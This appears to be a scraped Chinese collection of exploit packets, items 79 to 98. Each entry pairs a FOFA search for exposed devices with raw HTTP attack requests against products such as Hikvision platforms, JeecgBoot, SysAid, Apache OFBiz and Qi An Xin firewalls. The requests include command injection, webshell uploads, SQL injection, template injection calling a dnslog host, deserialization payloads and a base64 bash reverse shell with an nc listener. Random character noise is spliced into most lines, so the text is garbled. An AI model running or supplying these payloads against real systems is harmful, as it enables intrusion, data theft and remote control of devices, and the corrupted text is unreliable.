GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.10 F0 Y* g5 ~7 ^5 m/ d6 @1 Q
Host: x.x.x.x
- Q& X( J" [5 \ \9 P
6 o O: _/ Q3 h6 U
9 b2 a& ? c% Z1 ] r7 {79. BYTEVALUE 百为流控路由器远程命令执行
8 J8 ^$ [/ h5 f- ~7 S$ ?7 sFOFA:BYTEVALUE 智能流控路由器( C# G& h2 w5 N6 h
GET /goform/webRead/open/?path=|id HTTP/1.1/ E6 P: L& L- z" G* ^! u- b
Host:IP" e& [8 D' L( W! M: G* Q( V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
. j4 Y" y7 j7 t# }" G" ^* l0 sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 N' M2 x, M! ?( n$ Y DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* }2 _4 c3 a2 Y9 `2 m4 [- {Accept-Encoding: gzip, deflate; J! _: q, {+ R0 A& Z% [& H" Q$ G
Connection: close x0 i# E, p3 Q5 f! _- r, L. p
Upgrade-Insecure-Requests: 1
/ G G5 k' q2 h$ [# _2 O
( Y* i" s3 k% ?2 ?' l1 c1 q! U
0 ]/ `; ~# i; e: u80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
8 Y) _2 W+ Y0 w( Q, D$ bFOFA:app="速达软件-公司产品"
. U) f7 E9 s8 z4 F( @8 U' zPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1+ x: _3 V& D/ T" F6 a
Host: x.x.x.x
$ r6 q- j- @" R* m1 K& jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ v/ x) X' Y5 sContent-Length: 27
5 D8 O4 r4 b$ g, u) K, h- u+ VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 ]. i, m) f. t$ P: X2 N& y+ x
Accept-Encoding: gzip, deflate
/ p" J# y) Y" o% j1 i6 j# oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' j# X' C9 u& j/ `- Y% Q3 {( s+ E
Connection: close6 y2 s$ m( x; R e9 P, l$ N" C
Content-Type: application/octet-stream* q% Z, L R6 X. `0 F9 H
Upgrade-Insecure-Requests: 18 X+ e& i$ O2 [" s$ W F) O
& D( q2 E; I+ @6 B- d- @2 H
<% out.print("oessqeonylzaf");%>! C: J _4 ^" X4 ~' m& W0 r# M
9 K( c- w2 \3 z! J" p
) V1 y/ ~( i- M' r7 aGET /xykqmfxpoas.jsp HTTP/1.10 E% {3 A, A0 j
Host: x.x.x.x
4 H' e3 n; l- N* J' H% gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" r4 Z/ u) o( E4 z( t$ B) y/ VConnection: close
3 `, Y) e5 G- w: MAccept-Encoding: gzip$ @0 U; @$ q# H( a9 \7 H
9 d& m' C2 o# U# z
5 p/ D- ~3 S! }6 A' F. w
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露, A' i' ]: z3 ?' i! r" H
FOFA:app="uniview-视频监控"8 v9 ~, D+ Y: O
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1: W) r1 \ ]% T8 {# `
Host: x.x.x.x3 l, i; r* S5 [! L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" {+ w! ^2 F& M/ }/ q8 Z
Connection: close
. a& j' o/ q0 K9 }! zAccept-Encoding: gzip
# d" G: I) S- }" J2 Z
3 ]6 L e# {# I U
$ Z* p! ^0 m. |& A- r8 P* d82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行# e9 }: u7 M0 T& h( K
FOFA:app="思福迪-LOGBASE"8 I2 e$ l9 k& w2 E
POST /bhost/test_qrcode_b HTTP/1.1
5 q- F% M; \- v8 ~$ O {' S% JHost: BaseURL
$ |+ X h4 _9 [9 C2 |7 gUser-Agent: Go-http-client/1.17 n( [/ W2 h4 }+ O @+ A
Content-Length: 23* i9 e' d0 u* d# n/ S. I9 i
Accept-Encoding: gzip8 }- x8 H7 U; E9 u" r4 g9 {
Connection: close/ \+ M/ f' {& _ r; `
Content-Type: application/x-www-form-urlencoded& I8 u- ~# l9 G& ^
Referer: BaseURL
8 i7 @- X- l+ @* x3 i
e( t4 Z$ r( J) L8 y+ F/ l/ xz1=1&z2="|id;"&z3=bhost
# S6 h+ {+ a: ^ j+ G' [1 P8 ?" p, M2 W8 p# E b
' g' ]1 m$ C$ a' [+ Y$ x
83. JeecgBoot testConnection 远程命令执行
A4 {) ^) j+ c0 WFOFA:title=="JeecgBoot 企业级低代码平台"
1 P5 M e3 @% o( {8 [$ x
: @; |9 h& Y9 ^* k+ i9 d I
, h$ o- o- {. s3 ZPOST /jmreport/testConnection HTTP/1.1
# [3 ?5 O3 C1 A0 z- L' {% `Host: x.x.x.x! E4 T2 ~( z. |; h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& X1 g7 }- z( X4 M( o q7 l
Connection: close
: n5 j. Z) I, G+ f' c/ Q* u! T. ]) ~* DContent-Length: 88810 t' u- Q; _$ h$ z, ~+ W
Accept-Encoding: gzip
8 m4 J9 T6 n$ q2 t XCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"# D, N' h) m: s7 s6 y- V+ `
Content-Type: application/json
a3 H& I% W* @, K9 q) V( v5 A, _5 Y2 I1 \( c
PAYLOAD
8 C; H9 x M+ f# @, S9 m
" V2 X! ?' s! Y' e84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
* J5 [9 [5 \$ q4 r) JFOFA:title=="JeecgBoot 企业级低代码平台"
/ H5 {: ?; W- m4 P% z5 U3 h$ m" e v
. |% U, x* ]5 H8 z7 V' c
6 x, o1 y1 }, X; LPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
6 t& H' c" n3 x- o4 m. I, j4 Z& B* XHost: 192.168.40.130:8080; T: R) J9 H' t5 A+ Q! i
User-Agent: curl/7.88.14 ], S" r) {0 R3 R A! e
Content-Length: 156
8 n3 M) N& I4 ?9 r$ ZAccept: */*6 e# z6 E2 T1 u C& I" a
Connection: close* p$ v" h! _8 Y1 B2 H7 c6 _: t
Content-Type: application/json' Z1 Y' v7 W6 ? v0 w
Accept-Encoding: gzip. R6 Q$ v# z# m0 S% p5 r3 @3 g% a
6 K6 j, g4 k" u8 }! a{( l1 v2 Y- V% W2 |- v! X
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",4 b- Q% q- H7 e0 k/ a. \
"type": "0"# \ l5 y6 [- L
}
2 B2 }( ], D( _+ ] F* s
1 h9 E' K. P7 y6 ^( o
4 k, h' r! g0 n! m8 _$ g, ?85. SysAid On-premise< 23.3.36远程代码执行5 ~* h! V5 J% `5 n" _( U( p
CVE-2023-472465 j R- @5 R' e. R
FOFA:body="sysaid-logo-dark-green.png" ( l9 _4 P7 N. {
EXP数据包如下,注入哥斯拉马
& U, Y9 C! X: w/ I- @POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1/ }6 s0 H7 x0 } y1 P
Host: x.x.x.x
; H9 Y8 y w3 CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# n, Q; e: S- d) M8 sContent-Type: application/octet-stream2 O! D9 h4 E2 r5 y3 C* o
Accept-Encoding: gzip
, m4 B+ Y- o. y. d1 I3 X3 X" }
% G4 y, a, }/ q' APAYLOAD" ~, v1 J, g' G
9 [4 I. O* s+ Q回显URL:http://x.x.x.x/userfiles/index.jsp4 _0 P! h5 V! T( C( }" x: t0 ?* B
% h! ~5 D/ [' l9 V, F86. 日本tosei自助洗衣机RCE
1 f8 c7 g6 q: K9 ~% N4 e! JFOFA:body="tosei_login_check.php" {* ?2 P, P2 v
POST /cgi-bin/network_test.php HTTP/1.1/ a# J, A+ k) A6 b
Host: x.x.x.x
$ F2 o5 Q3 E/ U- JUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
( ~5 l! w* X# O, {Connection: close! `9 R# _. z, \, I6 v
Content-Length: 44& ^! r7 H V' u7 |3 a
Accept: */*5 b4 f; c- ]2 p$ z2 S
Accept-Encoding: gzip7 w$ K: {; R1 S, v' I+ c
Accept-Language: en
4 Z& ^. ]" b* c2 }/ r/ o. PContent-Type: application/x-www-form-urlencoded
+ V @. n. c) h+ j: \0 r2 r" _; R
host=%0acat${IFS}/etc/passwd%0a&command=ping
* g2 } N6 w5 r& j- P! m- X2 k- n& p: B- q9 L4 F0 i- d4 r
3 v" N$ c! X0 V T( g7 T, s3 }
87. 安恒明御安全网关aaa_local_web_preview文件上传
2 K8 x* ?( p4 T u7 }% L' M _" J/ G9 NFOFA:title="明御安全网关"1 h; P! ]! r* F* u2 Q
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
! _ r" S: s3 w* T' h6 V2 Y7 H; {Host: X.X.X.X
. w* F* P; K) G! F) MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# l+ O! K$ l" A! U- C7 rConnection: close
5 l: N$ r* Q& X3 I- g" pContent-Length: 198
6 C8 }$ m! Y6 g/ {/ {Accept-Encoding: gzip
8 t# s7 L* t9 FContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
H6 v. v6 ~1 q- I4 ]& F! f( B* ?' B' U
--qqobiandqgawlxodfiisporjwravxtvd
Y7 j2 w+ w: @' r3 i7 |3 OContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
9 N! h) ^7 K8 c, E, N. l- `* }! v2 lContent-Type: text/plain! f! m; i: r1 u2 I5 F# ^
' C: [" W0 G7 v, O
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
8 k8 Q& m* y3 Z( w8 R l/ w--qqobiandqgawlxodfiisporjwravxtvd--
2 H) W6 O; N! U. V
: J4 V- y/ i7 M: T* J. R7 K7 Y4 q) ^5 j8 b
/jfhatuwe.php
: W# D% L' ~% H S
8 k6 O5 O9 l: `; Y88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
6 f6 ^9 C; _, QFOFA:title="明御安全网关"
9 x7 G& F9 Q# f' ^$ a3 L5 c$ bGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
1 @* Z i4 H( M1 t v) Y5 N2 |9 oHost: x.x.x.xx.x.x.x. H* X' P& g7 R/ i; Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 f6 u. y* j6 t! M5 m0 dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 z+ ^* s5 A: U3 Y* P
Accept-Encoding: gzip, deflate9 t8 m( E; P- s( `$ U( [0 Y; ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) _' @ F! F! E+ y; R( Q- ]. gConnection: close% H( M# X; n6 V+ \, T: |4 h
* m" J+ U8 z4 E8 k$ A8 p2 Z; U2 g
3 J9 b# y2 K( s% A9 u9 y) f/astdfkhl.php
' }# I C3 k' g$ M
) ~$ j" m& k0 J89. 致远互联FE协作办公平台editflow_manager存在sql注入
1 u. n5 [- l% h( j4 f3 DFOFA:title="FE协作办公平台" || body="li_plugins_download"6 T, u' r0 o. E2 a
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
6 y$ C7 B, ^- o# G xHost: x.x.x.x
% l' ~' ]( s" M! d" TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 `( r" o( _; }, N
Connection: close' |, l/ F @5 J% l* w H( d
Content-Length: 41, a2 P1 G7 x- A
Content-Type: application/x-www-form-urlencoded
& c4 A& u9 [& F% ]Accept-Encoding: gzip' X4 o9 T3 u4 w! s: N7 B- @
2 C6 U J. v! C& }. `4 W$ P/ |- s
option=2&GUID=-1'+union+select+111*222--+0 ^2 Q3 A; Z$ y) O# t/ ?( E& A
; ^# F" s8 y9 i. i. L) G; e# i- h
& ^2 s/ S$ o+ j7 ?$ z8 o2 R$ x* z90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行# `3 ?6 i' y4 x3 J' P
FOFA:icon_hash="-1830859634"+ @5 `. J- _$ b- g" q, z3 N
POST /php/ping.php HTTP/1.1+ }6 j1 Z0 j$ o' R( J; n
Host: x.x.x.x* D/ [* J8 H: P# z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
$ ]2 l+ P% X. L/ S: r) {7 e: T, x2 }Content-Length: 51+ p Y: P, z1 e! }3 F- [! [
Accept: application/json, text/javascript, */*; q=0.01
, K: K- V3 }" K1 c0 M; jAccept-Encoding: gzip, deflate
+ @7 M1 K+ r& a6 L6 Q. E$ u) u. OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 v8 D/ [. [7 L( w/ l& @, W1 gConnection: close
8 }; ?5 V4 j: B" i/ ]8 ] z6 V$ [Content-Type: application/x-www-form-urlencoded/ N h2 P C; u3 N, z
X-Requested-With: XMLHttpRequest, y- A/ b( Y6 Z1 D" \1 G) V) N
4 z& R9 r, @, Y2 L9 hjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
; }# V) \/ n& }# ?) w$ g# {+ { G) e. \- S. K; y7 n+ \7 @4 O: ~
2 z+ _2 r( R* L2 w! v
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取+ T) O0 X/ @ h1 _1 m
FOFA:title="综合安防管理平台"
# b( ?8 h* T& E3 W3 J; d8 Q+ m5 ^, xGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1/ d9 J. n; O) @" c |) h) V. n/ Y
Host: your-ip
9 y! S1 k$ n: @9 i4 p2 ~' HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
. Z' h7 L; `9 A) U' VAccept-Encoding: gzip, deflate5 t2 ~5 ?& V2 [
Accept: */*7 ]1 ^; p2 [' l' d6 Y( v) h
Connection: keep-alive2 V2 c2 S& F/ U! `$ y
9 M( `; `# l* B& R9 X6 h/ R8 C7 }, g* Q
# e- {8 H& m2 ~3 ~+ i( H0 G6 W, X7 g. `3 s9 |. U0 G" d4 P- A
92. 海康威视运行管理中心session命令执行
' p% p! C7 U* WFastjson命令执行& t ~1 ^* j! D7 T
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"3 M8 K3 s1 f C' {3 w
POST /center/api/session HTTP/1.1
% S5 x7 Z" L) O U7 O5 PHost:
9 W" V' G4 s& X; }, C% D7 a: cAccept: application/json, text/plain, */*2 f0 P% f9 \1 Q( j" }! i
Accept-Encoding: gzip, deflate" o& ^. X+ s( k! Y- ?! Y7 _
X-Requested-With: XMLHttpRequest/ u' F: c( [1 Y# c: z, Z% T' o6 e. p
Content-Type: application/json;charset=UTF-80 V8 q- n6 r1 X/ v r7 X" P3 Y
X-Language-Type: zh_CN
: e7 ~5 ?3 t0 iTestcmd: echo test/ c. b4 G+ n; k5 \# j- h [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
5 w+ g5 j; s/ H$ H+ S! sAccept-Language: zh-CN,zh;q=0.98 K' v( k/ E& F& @( s1 @
Content-Length: 57784 W# M f% j$ h) y. E0 p9 e
* G: {7 C) p+ |# `& R
PAYLOAD
3 ?' U9 _! O9 p3 R' V+ W! D8 B% x7 h8 x& O1 b
! Q. k8 ~: d5 d# G4 v93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传* U/ Z' S% P! m5 C) q
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="! i) |8 `2 |% V# Q6 `' T
POST /?g=app_av_import_save HTTP/1.1& I/ G3 [4 u* ^) ] g; p
Host: x.x.x.x
) d, d' J1 g1 X& E/ aContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
- ^# p5 G2 j0 x% s8 } l% y4 V: oUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 c* @* U- S8 n) {" P5 N1 ?* _8 u
! R7 W2 Y$ a% |3 Y* ~, B
------WebKitFormBoundarykcbkgdfx' P( U/ |6 y2 C& D
Content-Disposition: form-data; name="MAX_FILE_SIZE"2 Y" [( k. e) R1 p8 Q4 j8 W
8 \7 e' Y% g1 X7 h8 y10000000
3 q6 L, Z- b6 J2 h t' r% m& D2 N0 N------WebKitFormBoundarykcbkgdfx; X" P! J- {+ z1 p2 v% `1 D% ^
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
! G/ o$ x* L) I" ]7 Q8 R eContent-Type: text/plain
3 E% l5 p$ m h# D% V8 F$ t
* R' K: r+ F: G8 V3 H% U" Nwagletqrkwrddkthtulxsqrphulnknxa5 r* U% [" j6 ^9 L% }+ O! @
------WebKitFormBoundarykcbkgdfx
4 V* j/ V) U) H$ OContent-Disposition: form-data; name="submit_post"6 P8 T! s8 ^" d/ M9 N+ D- m
5 o1 t* x1 q7 e; vobj_app_upfile
* b& ]$ U2 ]: h------WebKitFormBoundarykcbkgdfx7 r! J3 Y$ u& [! F/ T! b3 H0 W; G
Content-Disposition: form-data; name="__hash__"% O E% q9 S5 D# V5 ]: d6 _
2 i! F) Y( Z& b. g, t0b9d6b1ab7479ab69d9f71b05e0e94455 z. P5 G1 v; d4 j* l. W4 z
------WebKitFormBoundarykcbkgdfx--
X7 `) x6 _2 i) y, ^1 @ v7 l R( f* M
+ X' C, I W; m" }+ [$ m4 M* r) [0 |# k
GET /attachements/xlskxknxa.txt HTTP/1.1* l- u, A8 x2 K
Host: xx.xx.xx.xx o+ t# ]$ h( ^
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 T$ c' `1 c' s! x ]! O, n; q; z5 G d& S; O4 t- t3 J
7 f+ A5 ]$ d. P+ b: m94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
5 i& R9 X6 d+ L# t3 O3 M7 k9 PFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
D/ N0 c2 b: O) C7 a) sPOST /?g=obj_area_import_save HTTP/1.1
2 | e6 X0 R( o. e$ S* q9 hHost: x.x.x.x
3 Q8 b* t* Y e& EContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt3 K0 V% p% N2 @ P9 @3 T" D. O: P& H% }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
) f; n& d6 P: Z/ H! n# D' K
9 m' A0 b! l! k, I( s) P) @------WebKitFormBoundarybqvzqvmt
4 n4 u% l+ d$ K9 r p1 ?+ W# L) a) SContent-Disposition: form-data; name="MAX_FILE_SIZE"$ g2 b- o7 t0 Q: m+ z
; n" K$ O$ I( O V7 G, L4 x# W: `, b
10000000: h( I$ n4 t L# N+ v" A$ \' W. P
------WebKitFormBoundarybqvzqvmt7 A: ]/ p4 G1 U/ h" A3 I# K' V
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
$ l7 [- ?( ?/ j- Q2 f0 K' M% CContent-Type: text/plain# \$ g! ?: C2 R4 r/ g! |$ \7 P' r% v
0 Q6 F, I. h2 C; ]: W
pxplitttsrjnyoafavcajwkvhxindhmu
' [ A. t9 b0 Y$ a) a7 ~------WebKitFormBoundarybqvzqvmt
& C2 y9 x4 [" T8 N0 ?Content-Disposition: form-data; name="submit_post"; d2 a1 |: d# ^
& q: o" f/ q7 [0 _# [
obj_app_upfile
: y+ m6 B7 a" a/ e$ n------WebKitFormBoundarybqvzqvmt/ k, j7 s6 m. x* O- s3 e5 M
Content-Disposition: form-data; name="__hash__"4 U c8 p4 }$ ?/ s' j p. Y+ x
- X% g) k3 A, Q8 [) P0b9d6b1ab7479ab69d9f71b05e0e9445
. }) W& I" |2 s4 [% K$ ~------WebKitFormBoundarybqvzqvmt--
7 W3 L8 v2 Z9 P- b( t4 w: l) T1 L2 v+ ~9 k/ g5 ~5 s# f
( C! o$ u. H' T6 p0 P3 [# o, R
; @4 @6 E8 T# o- c3 `* A' tGET /attachements/xlskxknxa.txt HTTP/1.1
. l+ C6 }7 R8 U8 q0 CHost: xx.xx.xx.xx+ R) }+ V- S, m" t! n! D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 Y3 i; c. ~/ U6 e6 l" @, j) Y
; w2 n4 Q) e. m- V0 U8 {
( M- s4 K) \8 x9 s' d: b
w; ~2 {7 H* C' q95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行8 k* E, ^* V$ R+ m( N
CVE-2023-49070
- m$ |# c! E2 }) t7 M7 ]FOFA:app="Apache_OFBiz"+ W* ?& z" E; _1 G, n/ C* o- H' A- V
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1! q+ X M1 I0 O) T4 s
Host: x.x.x.x/ t3 N3 ^+ l% s3 |- t5 d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36# L% u W2 i% h2 r- K0 a& ?& i; ^
Connection: close3 c- B) G; F- L; H6 p' r( w% R6 |# b
Content-Length: 889
( p' `5 u& I& m7 F* F! i! c7 V0 iContent-Type: application/xml/ E6 u5 s2 V V$ v* j
Accept-Encoding: gzip: g' s% S7 x2 {" @) i' O1 M4 P
& m' o3 a2 n$ G; P" s7 z# t9 ~
<?xml version="1.0"?> T, Q4 g8 B/ j- b! E* P3 J
<methodCall>2 y5 ^, X( X; ^" G7 M. k0 E
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
0 K" i; Y7 z: N0 |3 D/ [! j3 A <params>6 z. T, `5 w8 N
<param>" X; W, @. B& H! x
<value>1 }' n5 d) {+ }6 t- Q
<struct>8 |/ c& s- f6 B9 Q1 |7 B
<member>2 A) O9 X6 j4 c9 c
<name>test</name>( W8 B: o3 [! L1 ?3 i4 m$ y8 E
<value>
" u" _3 b- G: ~* i <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>, X# D( B' i3 |# w
</value>
8 w: a: u) `* a( x4 x </member>5 ]/ M' {8 o3 S8 [
</struct>
1 c$ i( L% k: b% O1 D </value>2 X2 j* Y2 V1 M0 B0 g& ~
</param>1 S1 m5 S0 I7 \3 U: {
</params>
6 {) w, Z7 I3 m* o* j</methodCall>
- i0 h) g/ H/ o# T) r
) v6 Z# t' q" w. S8 b- z7 h# T' T. L6 a6 X
用ysoserial生成payload
" ?+ F P4 ?8 Y& p# P* l- T Sjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
* {" }! Y0 w3 D/ n ? o# p! X! z! ?# R: A$ w
. ]$ R: J. z- u* X' d- _
将生成的payload替换到上面的POC- @' ~3 J4 i3 y) A6 l
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1$ K6 o+ t# P) g6 Q3 O
Host: 192.168.40.130:84438 `, u+ n! L4 V7 H; E# p0 d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36: o# [! c0 t" ]2 @% C
Connection: close( D3 G+ b. D3 l$ a# Y
Content-Length: 889
3 P2 E: L Q9 W- ~3 x; O: s* VContent-Type: application/xml
5 N5 J) S0 W3 J: a% b/ s qAccept-Encoding: gzip
0 t/ y0 c! e2 i, Z- F6 N9 q. [& E& M# V" [ h: [
PAYLOAD
' F$ j. O1 {, u( h9 T% z4 B0 R" @! E+ R1 p7 O F" Z' f
96. Apache OFBiz 18.12.11 groovy 远程代码执行5 u) b' i7 S; `$ X9 k: E: \; Y
FOFA:app="Apache_OFBiz"
2 ^& o" k2 t, ?" h4 f1 o; gPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
( U; a/ z o* `" z" K# _Host: localhost:8443$ c7 n3 G" M% M5 }; \3 ^; U) s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.06 {+ P# x7 t! u: v, ~
Accept: */*
1 Y$ h; S+ `7 PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# {8 F9 c8 }7 c2 t7 X1 ~9 L
Content-Type: application/x-www-form-urlencoded
9 \! p1 Y7 @% ~" m0 _) TContent-Length: 55
+ E- f0 M- m: {: Q: \- K/ n4 D
( `" `$ y }* l' N4 OgroovyProgram=throw+new+Exception('id'.execute().text);- V/ V" B& `6 z/ f6 [
. c, f! g5 ?! ]; K. K. ]
! \5 Z) E# x& I% {- I反弹shell
2 i8 R" h: V t# c$ a4 j在kali上启动一个监听
+ N" U' R" V Ync -lvp 77775 V/ L% L; e# H
1 r$ d0 R7 r, _
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
: j: V. d3 ?9 Q* f' mHost: 192.168.40.130:84437 i7 y% x% t3 ^" }) e& j5 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ e: o3 I2 ~; a3 \ E6 C" P& xAccept: */*
. i+ K1 }! t% {9 D4 eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& t3 u( f5 c7 T C
Content-Type: application/x-www-form-urlencoded' O# ~! H0 w! ?
Content-Length: 716 ~8 Q% H/ ^. @+ p; J
% d% I$ }6 M$ L1 |# }# _; n- n
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
7 f) y3 D, |2 s* ^/ n. |0 r0 q
" J2 Q/ o; u3 P9 F9 K$ A3 e9 n97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行 O7 `% A) c/ e8 r/ u4 f% q
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"2 \% m! U7 e1 M! K& F8 k/ D/ g2 B
GET /passport/login/ HTTP/1.1
1 _( G1 ?, y6 Z1 G3 }) @) DHost: 192.168.40.130:8085, I! h4 [7 b; H4 e/ Q8 i% N# C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 N3 Z- D, a8 y9 ?6 s6 S! {6 ]
Accept-Encoding: gzip1 e5 v7 h1 R+ h+ x; @1 {- K. n
Connection: close6 F: h3 v. @+ i
Cookie: rememberMe=PAYLOAD' N( ?- P: X: ]0 \. X
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
, k1 u4 Y0 z2 Z" t+ l N& @2 T* j! ~/ `2 r* Y' a) E
( u) y4 y8 J' r/ H98. SpiderFlow爬虫平台远程命令执行
" R/ s, o5 J; l' y+ n& O3 tCVE-2024-0195
+ o u# N! ?6 t0 U% PFOFA:app="SpiderFlow"
4 W0 `8 q' D+ Q8 g% c! c- s. L, ]POST /function/save HTTP/1.12 e: y6 n2 K% [- H! A; b1 o/ j
Host: 192.168.40.130:8088
+ J+ O/ L1 i, E. n0 \$ QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.07 p: ?8 e$ j# F% g0 N
Connection: close3 Q* @! O6 C' ~- W! w
